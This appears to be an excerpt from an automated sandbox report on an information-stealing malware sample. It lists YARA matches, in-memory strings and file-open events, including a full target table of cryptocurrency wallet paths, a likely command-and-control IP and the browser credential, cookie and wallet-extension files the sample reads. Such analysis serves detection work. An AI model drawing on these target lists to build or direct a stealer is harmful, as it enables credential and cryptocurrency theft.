                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                                    Source: Yara match, File source: 7.2.skotes.exe.f50000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 72.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 75.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 5.2.456YTTQ213T2RO9QAEYSNNZDL.exe.e70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 28.2.HJEHIJEBKE.exe.6c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 6.2.skotes.exe.f50000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                    Source: Yara match, File source: 0000004B.00000002.2646109112.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000007.00000002.1917695325.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000048.00000002.2597235360.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000006.00000002.1915110312.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000005.00000002.1849269108.0000000000E71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: 64252d274d.exe PID: 7584, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: 696689ce6d.exe PID: 1072, type: MEMORYSTR
                                    Source: Yara match, File source: Process Memory Space: EdYEXasNiR.exe PID: 6464, type: MEMORYSTR
                                    Source: Yara match, File source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 00000003.00000002.2212351037.0000000000EF1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, String found in binary or memory: Electrum
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, String found in binary or memory: \Electrum\wallets\
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1620659992.000000000191D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, String found in binary or memory: exodus.conf.json
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, String found in binary or memory: \Exodus\
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: ElectrumLTC
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: \Ethereum\
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600004491.0000000005F70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3IW
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: Ethereum
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1620659992.000000000191D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16tti\AppData\Roaming\MultiDoge\multidoge.wallet*
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1600078469.0000000001915000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveMKAB
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-wal
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-wal
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
